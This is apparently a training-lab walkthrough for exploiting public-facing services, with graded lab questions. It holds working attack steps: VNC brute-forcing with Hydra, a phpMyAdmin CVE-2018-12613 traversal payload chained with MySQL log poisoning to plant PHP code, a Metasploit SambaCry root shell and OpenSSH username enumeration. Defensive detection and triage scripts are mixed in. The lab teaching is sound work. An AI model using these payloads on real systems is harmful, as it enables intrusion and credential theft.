Brute-forcing is the process of discovering weak login credentials by trying candidate usernames and passwords against a service, and it is typically one of the first actions performed during security assessments of public-facing applications. Because different tools are built for brute-forcing different protocols, a framework that eases the launching of customized brute-force attacks is often useful.

BruteDum is a Python tool that combines service enumeration with existing brute-forcing tools. It lists the best tool to use for each service found, cutting down the time it takes to pick the right attack technique, and organizes powerful tools for breaking into user accounts on services such as SSH, VNC, etc.

To get started, change into the BruteDum directory, which is preinstalled on the system: `cd Exploiting-Public-Facing-App`

BruteDum cannot find password lists saved outside its own folder, so any custom list must be copied into that directory. A password list is already located there. To run BruteDum, use the following command: `python3 brutedum.py`

Target Address

The tool first prompts for the target's IP address. In this example our own machine is the target, so type `localhost`.

Once you have done so, press Enter, and the program offers to run an Nmap scan. This is a convenient feature for discovering other services open on the same machine. Type `y` and press Enter to run the scan.

The scan results show that 6 ports are open on the machine, labelled 1 through 6 in BruteDum's menu. The next step is to select a service to crack. Enter `6` and press Enter for VNC cracking.

Tool Selection for BruteDum

After scanning VNC, BruteDum lists a few tools for brute-forcing it; in this case Hydra is recommended. Hydra is a network login cracker that supports many protocols. To use it, type `2` and press Enter.

Set Username and Password List

When asked for the wordlist, enter the one the lab provides in Downloads/BruteDumps: `Top207-probable-v2.txt`. Hydra will go through the wordlist and attempt to authenticate to VNC with each candidate password.

Launch the Attack

The default VNC port is 5900, but some machines use a non-standard port. When BruteDum asks whether to use the default port, answer `n`, because our target runs VNC on port 5901.

Next, enter the port number: `5901`

Once the port is set, BruteDum automatically launches Hydra to brute-force the VNC password.

If the attack succeeds, the valid password is printed. Otherwise Hydra reports that no password in the list matched. The method only works when the correct password is in the tested list, so the choice of wordlist matters, and keep in mind that many VNC servers temporarily blacklist a client after a handful of failed attempts, so a noisy attack can lock the attacker out for a while.

When prompted to continue, press `n` to exit the tool.

If a valid password is obtained, an attacker can use Remmina, a remote desktop client that supports VNC, to connect to the VNC server and gain initial access to the system.
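One detail worth preparing for before handing a list to Hydra, as an added example that is not part of BruteDum or the original walkthrough: classic VNC authentication derives its DES key from the first 8 bytes of the password and ignores the rest, so a wordlist can be collapsed to its distinct 8-byte prefixes before the attack. The Python below does that and builds the Hydra invocation BruteDum wraps; the sample list and the file name vnc_words.txt are constructed for the example.

```python
"""Prepare a wordlist for VNC password brute-forcing.

RFB "VNC Authentication" uses only the first 8 bytes of the password as a
DES key, so two candidates that agree in their first 8 characters are the
same guess. Collapsing them before calling Hydra avoids wasted attempts,
which matters because VNC servers often blacklist a client after a few
failures.
"""

VNC_PASSWORD_BYTES = 8  # RFB VNC Authentication truncates passwords here


def vnc_candidates(words):
    """Return the distinct VNC guesses in the input, in first-seen order.

    Blank lines and '#' comment lines are skipped; each remaining word is
    truncated to the 8 bytes VNC actually uses before de-duplication, so
    'password', 'password1' and 'password123' count as one guess.
    """
    seen = set()
    out = []
    for raw in words:
        word = raw.rstrip("\r\n")
        if not word or word.startswith("#"):
            continue
        # Truncate on bytes (what the DES key is built from), not characters.
        guess = word.encode("utf-8")[:VNC_PASSWORD_BYTES].decode("utf-8", "ignore")
        if guess not in seen:
            seen.add(guess)
            out.append(guess)
    return out


def hydra_vnc_command(wordlist_path, host, port=5900):
    """Hydra command line for VNC: there is no username, so only -P is given."""
    return ["hydra", "-P", wordlist_path, "-s", str(port), f"vnc://{host}"]


# Constructed sample list for the example (not the lab's Top207-probable-v2.txt).
SAMPLE_WORDLIST = [
    "123456", "password", "password1", "password123", "# comment", "",
    "12345678", "123456789", "admin", "123456",
]

if __name__ == "__main__":
    reduced = vnc_candidates(SAMPLE_WORDLIST)
    print(f"{len(SAMPLE_WORDLIST)} lines -> {len(reduced)} distinct VNC guesses: {reduced}")
    with open("vnc_words.txt", "w", encoding="utf-8") as fh:  # assumed output file
        fh.write("\n".join(reduced) + "\n")
    print(" ".join(hydra_vnc_command("vnc_words.txt", "localhost", 5901)))
```

Ten input lines become four distinct guesses; the saved file is what you would hand to Hydra (or to BruteDum) in place of the raw list.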

What is the password that was found by brute-forcing? 123456

phpMyAdmin 4.8.0 Vulnerability

phpMyAdmin is a set of open-source, web-based MySQL database management tools.

Versions 4.8.0 and 4.8.1 of the tool are vulnerable to file inclusion in index.php (CVE-2018-12613), caused by a validation bypass in the page-whitelist function Core::checkPageValidity. An authenticated remote attacker can include arbitrary local files and, combined with a way to write PHP code to disk, execute arbitrary PHP code on the machine.

Open a browser and visit the lab's phpMyAdmin host (phpmyadmin.com in this environment), which runs a vulnerable phpMyAdmin version:

http://192.168.1.100/phpmyadmin

After visiting the website, a login page appears. phpMyAdmin installations are known for weak configurations, so trivial database credentials such as admin / admin are common. Use those credentials to log in and reach the tool's dashboard.

Disregard any error messages that appear on the webpage.

PHPMyAdmin File Inclusion

Local File Inclusion (LFI) tricks a web application into reading or executing files on the web server that were never meant to be served. Depending on what can be included, this leads to information disclosure, Cross-site Scripting (XSS) and, where attacker-controlled content can be written somewhere on the filesystem, remote code execution.

The phpMyAdmin version running on this machine is vulnerable to LFI. To test this, once the dashboard is accessible, enter the following URL in the browser:

http://192.168.1.100/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

This payload abuses the target parameter. The whitelist check URL-decodes the value one extra time and only looks at the part before `?`, so the double-encoded `%253f` (which reaches PHP as `%3f`) makes the check see the permitted page name db_sql.php. index.php then includes the raw value, in which `db_sql.php%3f` is treated as a directory name. In Linux-based operating systems `../` refers to the parent directory, so enough of them climb to the filesystem root, from where any readable file can be reached. In this case the content of /etc/passwd is shown; this file lists the machine's user accounts.

Executing Getshell Commands

Several getshell methods can exploit this vulnerability, such as redirecting a log file that MySQL writes, or writing a one-line PHP web shell (a "one-sentence Trojan") into a file that can then be included.

In this example, MySQL's logging capability is abused to create a malicious PHP file. More specifically, the file is created by manipulating two MySQL global variables:

  1. general_log - whether the general query log is enabled. It has two values, ON and OFF.
  2. general_log_file - the path of the file the general query log is written to.

MySQL 5.1 and later maintain the general query log, allow both variables to be changed at runtime (SET GLOBAL requires the SUPER privilege, so the account used in phpMyAdmin must have it), and the server process has read and write permission on the log file it creates.

First, check the log status by running the following statement in the "SQL" tab and pressing "Go": `SHOW VARIABLES LIKE 'general%';`

If general_log is ON, every executed SQL statement is appended to the file named by general_log_file, here /1e164993aaf5.log.

If general_log_file is changed to, for example, 1.php, executed SQL statements are written to that file instead.

To set the general_log variable to ON, execute the following: `SET GLOBAL general_log = 'on';`

Next, change the log file to 1.php with the following statement: `SET GLOBAL general_log_file = '1.php';`

Keep in mind that phpMyAdmin may display database errors, but the statements are still executed. To confirm that the commands succeeded, check the log status again: `SHOW VARIABLES LIKE 'general%';`


If general_log is ON and general_log_file is now 1.php, the commands ran successfully. A relative file name is resolved under the MySQL data directory, so the path must point to a directory the MySQL server process can write to; otherwise the file cannot be created and MySQL returns an error.

Now run the following statement. It is logged to the newly specified file, which creates 1.php:

select '<?php phpinfo();?>'

After running the statement, 1.php is generated on the phpMyAdmin server at /var/lib/mysql/1.php, and the log line recording the SELECT carries the PHP tag. Including that file through the LFI from the previous section executes the PHP code, provided the web server process is allowed to read the MySQL data directory.
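The same chain leaves a recognisable trace in the general log itself. As an added detection example (not part of the original walkthrough), the Python below scans general-log lines in the MySQL 5.7+ file format and flags the three steps: enabling the log at runtime, pointing general_log_file at a web-executable file, and a statement carrying a PHP tag, attributing each to the account that opened the connection. The log excerpt is constructed for the example.

```python
"""Detect general-log webshell drops in a MySQL general query log."""
import re
from dataclasses import dataclass

WEB_EXECUTABLE = (".php", ".phtml", ".php5", ".phar", ".jsp", ".asp", ".aspx")
# MySQL 5.7+/8.0 general log line: <timestamp> <connection id> <Command> <Argument>
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<id>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")
SET_GENERAL_LOG_ON = re.compile(
    r"set\s+(?:global\s+|@@global\.)general_log\s*=\s*['\"]?(?:on|1)\b", re.I)
SET_GENERAL_LOG_FILE = re.compile(
    r"set\s+(?:global\s+|@@global\.)general_log_file\s*=\s*['\"]?([^'\";]+)", re.I)
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.I)


@dataclass
class Finding:
    line_no: int
    conn_id: int
    user: str
    reason: str
    statement: str


def scan_general_log(text: str):
    """Return a Finding per suspicious statement, with the user@host that
    opened the connection (taken from the matching Connect line)."""
    users = {}
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        m = LOG_LINE.match(raw)
        if not m:
            continue  # server banner / column header lines
        cid, cmd, arg = int(m["id"]), m["cmd"], m["arg"].strip()
        if cmd == "Connect":
            users[cid] = arg.split(" ", 1)[0]  # "user@host on <db> using TCP/IP"
            continue
        if cmd != "Query":
            continue
        user = users.get(cid, "?")
        if SET_GENERAL_LOG_ON.search(arg):
            findings.append(Finding(n, cid, user, "general_log enabled at runtime", arg))
        fm = SET_GENERAL_LOG_FILE.search(arg)
        if fm:
            path = fm.group(1).strip()
            reason = ("general_log_file redirected to a web-executable file"
                      if path.lower().endswith(WEB_EXECUTABLE)
                      else "general_log_file changed at runtime")
            findings.append(Finding(n, cid, user, reason, arg))
        if PHP_TAG.search(arg):
            findings.append(Finding(n, cid, user, "PHP tag inside SQL text (log poisoning)", arg))
    return findings


# Constructed excerpt of a MySQL 5.7 general log (tabs as the server writes them).
SAMPLE_LOG = """\
/usr/sbin/mysqld, Version: 5.7.22 (MySQL Community Server (GPL)). started with:
Tcp port: 3306  Unix socket: /var/run/mysqld/mysqld.sock
Time                 Id Command    Argument
2024-03-12T10:15:01.000001Z\t   12 Connect\tadmin@172.18.0.3 on  using TCP/IP
2024-03-12T10:15:02.000002Z\t   12 Query\tSHOW VARIABLES LIKE 'general%'
2024-03-12T10:15:03.000003Z\t   12 Query\tSET GLOBAL general_log= 'on'
2024-03-12T10:15:04.000004Z\t   12 Query\tSET GLOBAL general_log_file= '1.php'
2024-03-12T10:15:05.000005Z\t   12 Query\tselect '<?php phpinfo();?>'
2024-03-12T10:15:06.000006Z\t   13 Connect\tapp@172.18.0.4 on shop using TCP/IP
2024-03-12T10:15:07.000007Z\t   13 Query\tSELECT id, name FROM products WHERE id = 7
"""

if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print(f"line {f.line_no} conn {f.conn_id} {f.user}: {f.reason} :: {f.statement}")
```

Three findings come back, all on connection 12 from admin@172.18.0.3, while the application's ordinary SELECT on connection 13 is left alone. In a real deployment the same rules fit an audit-plugin feed better than the general log, since an attacker who redirects the log also redirects the evidence.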

Samba Vulnerabilities

Samba is a suite of applications implementing the SMB protocol, which Windows and many other operating systems use for client-server file and printer sharing. Samba lets Linux machines communicate with Windows machines on the network.

Many Samba deployments run outdated versions, providing an easy target for adversaries.

The first step is to determine whether a vulnerable version is in use by enumerating the target's version number. Use Nmap to scan the Samba machine: `nmap -sC -sV 192.168.1.100`

In addition to information about Samba, Nmap also resolves the machine's IP address to its host name.

Based on nmap, which ports are open on Samba Target? 80, 445, 22

Enumerating Samba Version

To learn more about the Samba version running on the host, use Metasploit's smb_version module. Metasploit is a penetration-testing framework that contains tools, libraries and modules that aid in security assessments.

First, open a terminal and launch msfconsole: `msfconsole`

After launching the tool, select the module to run using the following syntax: `use auxiliary/scanner/smb/smb_version`

The smb_version module is an auxiliary module that aids in initial enumeration. Next, set the IP address of the target: `set RHOSTS 192.168.1.100`

Lastly, run the scanner: `run` (msfconsole also accepts `exploit` as an alias)

The console will show the scanning results, revealing the version of Samba running on the target host.

This is crucial information: the host runs an outdated Samba version that is vulnerable to remote code execution. Because the vulnerability is well documented, exploitation scripts can easily be found in exploit databases such as Exploit-DB.

Based on the scanner results, what is the version of Samba? Samba 4.3.9 - Ubuntu

Exploiting Samba with Metasploit

After identifying the Samba version, perform the attack to gain a shell session on the Linux system. To do so, run the following command in msfconsole: `use exploit/linux/samba/is_known_pipename`

This module triggers an arbitrary shared library load vulnerability (CVE-2017-7494, "SambaCry") in Samba versions 3.5.0 up to the fixed releases 4.4.14, 4.5.10 and 4.6.4. It requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of that folder. In practice, anonymous access combined with common filesystem locations lets the module exploit the vulnerability automatically.

Next, select the target host for the exploit: `set RHOST 192.168.1.100`

Prior to running the exploit, two SMB options must be changed so that the module negotiates unencrypted SMB1 with this target. Execute the following in msfconsole: `set SMB::AlwaysEncrypt false` and `set SMB::ProtocolVersion 1`

Finally, run the exploit: `exploit`

If the attack succeeds, the module returns a shell on the target machine, confirming that the server has been compromised. Run a command such as `id` to verify access. To terminate the connection, press Ctrl+C and then exit msfconsole.

To which user did we gain access? root

OpenSSH Enumeration

OpenSSH is a suite of secure networking utilities based on the Secure Shell (SSH) protocol, which provides a secured channel over an untrusted network in a client-server architecture. This scenario demonstrates a vulnerability (CVE-2018-15473) that allows remote users to determine valid usernames on a victim system. It affects OpenSSH 7.7 and earlier; the fix shipped in 7.8.

The exploitation procedure is as follows: any remote user can send a malformed authentication request for a candidate username. A vulnerable server handles it differently depending on whether the account exists, answering with an authentication failure for an unknown user but dropping the connection for a valid one, so a script run from Kali Linux can confirm which names in a list are real accounts on the victim machine.

Check the target's SSH version with Nmap to see whether the machine is vulnerable:

nmap -sV -p22 192.168.1.102


What version of OpenSSH is the machine running? OpenSSH 6.7p1
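Both service checks in this lab (the Samba version from the earlier Nmap and smb_version scans, and the OpenSSH version here) come down to comparing a banner against a known-affected range. As an added example that is not part of the original walkthrough, the Python below parses the service lines of `nmap -sV` output and flags Samba releases affected by CVE-2017-7494 (the is_known_pipename bug, ranges as in the Metasploit module description above) and OpenSSH releases affected by CVE-2018-15473 (username enumeration, fixed in 7.8). The Nmap output is constructed for the example.

```python
"""Version triage of nmap -sV output for the two CVEs used in this lab."""
import re

SERVICE_LINE = re.compile(r"^(?P<port>\d+)/(?:tcp|udp)\s+open\s+(?P<svc>\S+)\s+(?P<ver>.+)$")
VERSION = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")

# CVE-2017-7494: affected from 3.5.0; fixed in 4.4.14, 4.5.10 and 4.6.4.
# Branches older than 4.4 received no fix; branches from 4.7 were never affected.
SAMBA_FIRST_AFFECTED = (3, 5, 0)
SAMBA_FIXED = {(4, 4): (4, 4, 14), (4, 5): (4, 5, 10), (4, 6): (4, 6, 4)}
SAMBA_FIRST_CLEAN_BRANCH = (4, 7)
# CVE-2018-15473: OpenSSH 7.7 and earlier; fixed in 7.8.
OPENSSH_LAST_AFFECTED_BRANCH = (7, 7)


def parse_version(text):
    """First x.y[.z] in a version string as a tuple, or None when absent
    (Nmap prints fuzzy matches such as '3.X - 4.X' when it cannot pin one)."""
    m = VERSION.search(text)
    if not m:
        return None
    return tuple(int(x) if x else 0 for x in m.groups())


def samba_vulnerable(version):
    """CVE-2017-7494 exposure for a parsed Samba version tuple."""
    branch = version[:2]
    if version < SAMBA_FIRST_AFFECTED or branch >= SAMBA_FIRST_CLEAN_BRANCH:
        return False
    if branch in SAMBA_FIXED:
        return version < SAMBA_FIXED[branch]
    return True  # 3.5 .. 4.3: affected and never patched upstream


def openssh_vulnerable(version):
    """CVE-2018-15473 exposure for a parsed OpenSSH version tuple."""
    return version[:2] <= OPENSSH_LAST_AFFECTED_BRANCH


def triage(nmap_output):
    """One dict per flagged open port: product, parsed version and CVE."""
    hits = []
    for line in nmap_output.splitlines():
        m = SERVICE_LINE.match(line.strip())
        if not m:
            continue
        ver_field = m["ver"]
        version = parse_version(ver_field)
        if version is None:
            continue  # fuzzy or missing version: confirm with smb_version or a banner grab
        if ver_field.startswith("Samba") and samba_vulnerable(version):
            hits.append({"port": int(m["port"]), "product": "Samba",
                         "version": version, "cve": "CVE-2017-7494"})
        elif ver_field.startswith("OpenSSH") and openssh_vulnerable(version):
            hits.append({"port": int(m["port"]), "product": "OpenSSH",
                         "version": version, "cve": "CVE-2018-15473"})
    return hits


# Constructed nmap -sV excerpt for the example.
SAMPLE_NMAP = """\
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.10 ((Debian))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
"""

if __name__ == "__main__":
    for hit in triage(SAMPLE_NMAP):
        print(f"port {hit['port']}: {hit['product']} {hit['version']} -> {hit['cve']}")
```

Port 139 is skipped because Nmap could only offer a fuzzy "3.X - 4.X"; that is exactly the case where the smb_version module earns its keep. Version triage only says a build may be affected; distributions backport fixes without bumping the upstream version, so confirm against the vendor's advisory before relying on the result.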

Creating a Username List for SSH

To build a list of default usernames a machine might use, create and open a new text file in /home/kali/Exploiting-Public-Facing-App: `nano usernames.txt`

Paste the following usernames into the file:

Admin
admin
root
toor
alex
albert
briana
brian
administrator
system
PC-ADMIN

Save the changes and close the editor.

The exploit uses this list to enumerate potential usernames on the target machine. The exploitation script, ssh_enum.py, is located in the /home/kali/Exploiting-Public-Facing-App directory.

Running the Enumeration Exploit

Make the exploit file executable: `chmod +x ssh_enum.py`

Run the script with Python to initiate the attack: `python3 ssh_enum.py 192.168.1.102 -w usernames.txt > valid.txt`

The -w option of the script specifies the path to the username wordlist. The scan's output is redirected to the valid.txt file.

To view the generated output, display the content of the valid.txt file: `cat valid.txt`

The attacker can now feed this list of confirmed usernames to Hydra or any other brute-forcing tool to compromise the target, then connect to the SSH server with the recovered credentials to gain access.

Conclusion

This lab provided a hands-on walkthrough of multiple techniques used to exploit public-facing applications by leveraging weak configurations, outdated software versions, and brute-force attacks. Starting with BruteDum, you explored how to automate brute-force attempts across various protocols. You then escalated your approach by exploiting vulnerabilities in phpMyAdmin, using Local File Inclusion and MySQL log manipulation to achieve remote code execution.

Next, you focused on Samba vulnerabilities, where outdated versions were enumerated and exploited via Metasploit to gain shell access. Finally, using a crafted username enumeration script, you targeted OpenSSH, laying the groundwork for further brute-force attacks with tools like Hydra.

These exercises highlight the critical importance of patch management, secure configurations, and strong credential hygiene in defending against real-world attacks.